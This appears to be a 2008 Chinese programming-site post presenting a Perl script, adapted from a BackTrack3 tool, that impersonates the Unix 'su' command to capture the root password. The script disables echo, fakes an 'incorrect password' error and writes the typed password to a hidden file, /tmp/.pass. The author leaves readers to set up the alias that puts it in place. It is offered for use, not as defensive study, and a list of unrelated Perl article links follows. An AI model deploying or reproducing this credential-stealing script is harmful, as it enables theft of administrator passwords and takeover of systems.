快捷導(dǎo)航

冒充su ,perl寫的su.pl盜取root密碼

更新時間：2008年09月14日 08:16:59 作者：

backtrack3里面/pentest/housekeeping里面有個超囧的偷root密碼的東西，冒充su ,perl寫的，管理員輸入密碼的時候還直接回顯

我改了一下，把回顯關(guān)了加了個延時：

#!/usr/bin/perl
# Written by xi4oyu <evil.xi4oyu@gmail.com>.

print "Password: ";
`stty -echo`;
$s1=<STDIN>;
print "\n";
`stty echo`;
sleep 3;
print "su: incorrect password\n";
chomp($s1);
$s2="Password is: ";
$s3=" ".`date +%Y-%m-%d`;
open (users, ">>/tmp/.pass") || die ;
print users ($s2, $s1,$s3);
close (users);

很明顯直接用是8行的，還有別名恢復(fù)等工作要做，各位看官自己搞定！

您可能感興趣的文章:

su
perl

相關(guān)文章

perl中單行注釋和多行注釋使用介紹
在編程時把一段代碼注釋掉，即通過注釋的方法，使其不能夠運行，但是依然存在于代碼中，等以后需要時再去掉注釋
2013-03-03
基于charles抓取https請求使用過程解析
這篇文章主要介紹了基于charles抓取https請求使用過程解析,文中通過示例代碼介紹的非常詳細(xì)，對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友可以參考下
2020-11-11
perl常問題集合之一
perl常問題集合之一...
2007-03-03
Perl模塊編寫說明
這兩天在用Perl編寫一些監(jiān)控腳本，其實寫代碼也是一件挺有意思的事情，就是挺廢時間的。而且，由于語法不太熟，基本想到一個東西都要先Google一下看怎么實現(xiàn)。
2008-06-06
[Perl]文字/代碼批量替換工具
[Perl]文字/代碼批量替換工具...
2007-04-04
perl腳本學(xué)習(xí)指南--讀書筆記
最近在實習(xí)，看著公司有些腳本是perl寫，久聞perl處理文本還是很強大的，趁著周末掃了一般這本書~記錄下了~
2014-08-08
Perl 獲取shell命令的執(zhí)行結(jié)果
Perl里可以調(diào)用Shell命令，有時需要根據(jù)shell命令的返回結(jié)果做進(jìn)一步的工作，如何獲得shell的執(zhí)行結(jié)果？
2008-12-12
fdupe 查找重復(fù)文件的Perl腳本代碼
fdupe 是一個很小的 Perl 腳本，用來檢索指定目錄并找出其中重復(fù)的文件，該腳本是通過文件內(nèi)容來識別是否重復(fù)文件，而非文件名。fdupe 無需其他 Perl 腳本支持，運行速度非?？?/div> 2013-03-03
perl常見問題集合之二
perl常見問題集合之二...
2007-03-03
perl中5個常見錯誤
php是用了很久了,python和ruby與用過,經(jīng)典腳本語言就perl沒摸過，現(xiàn)在在像小學(xué)生一樣抱著教科書啃。
2008-09-09